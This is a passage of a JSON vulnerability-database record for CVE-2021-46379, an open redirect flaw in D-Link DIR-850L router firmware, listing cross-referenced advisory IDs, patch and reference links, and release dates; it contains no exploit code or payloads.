        "db": "NVD",
        "id": "CVE-2021-46379",
        "trust": 3.9
      },
      {
        "db": "PACKETSTORM",
        "id": "167041",
        "trust": 2.5
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-006644",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2022-20161",
        "trust": 0.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "50907",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202203-469",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-46379",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2022-20161"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-46379"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-006644"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-46379"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202203-469"
      }
    ]
  },
  "id": "VAR-202203-0928",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2022-20161"
      }
    ],
    "trust": 1.35
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2022-20161"
      }
    ]
  },
  "last_update_date": "2023-12-18T11:56:26.780000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Patch for an unknown vulnerability in D-Link DIR850 ET850-1.08TRb03",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/325901"
      },
      {
        "title": "D-Link DIR850 ET850-1.08TRb03 Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=185142"
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/live-hack-cve/cve-2021-46379 "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2022-20161"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-46379"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202203-469"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-601",
        "trust": 1.0
      },
      {
        "problemtype": "Open redirect (CWE-601) [NVD evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-006644"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-46379"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.2,
        "url": "http://packetstormsecurity.com/files/167041/dlink-dir850-open-redirection.html"
      },
      {
        "trust": 2.5,
        "url": "https://www.dlink.com/en/security-bulletin/"
      },
      {
        "trust": 2.5,
        "url": "https://drive.google.com/file/d/1rrlwnixsheoo4smahrpkzsrzk5mwzqrf/view?usp=sharing"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-46379"
      },
      {
        "trust": 0.6,
        "url": "https://www.exploit-db.com/exploits/50907"
      },
      {
        "trust": 0.6,
        "url": "https://cxsecurity.com/cveshow/cve-2021-46379/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/601.html"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/live-hack-cve/cve-2021-46379"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2022-20161"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-46379"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-006644"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-46379"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202203-469"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2022-20161"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-46379"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-006644"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-46379"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202203-469"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-03-17T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2022-20161"
      },
      {
        "date": "2022-03-04T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-46379"
      },
      {
        "date": "2023-07-06T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2022-006644"
      },
      {
        "date": "2022-03-04T16:15:09.383000",
        "db": "NVD",
        "id": "CVE-2021-46379"
      },
      {
        "date": "2022-03-04T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202203-469"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-03-17T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2022-20161"
      },
      {
        "date": "2022-09-09T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-46379"
      },
      {
        "date": "2023-07-06T08:12:00",
        "db": "JVNDB",
        "id": "JVNDB-2022-006644"
      },
      {
        "date": "2022-09-09T16:39:27.340000",
        "db": "NVD",
        "id": "CVE-2021-46379"
      },
      {
        "date": "2022-05-12T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202203-469"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202203-469"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Open redirect vulnerability in dir-850l firmware of D-Link Japan Co., Ltd.",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-006644"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "input validation error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202203-469"
      }
    ],
    "trust": 0.6
  }
}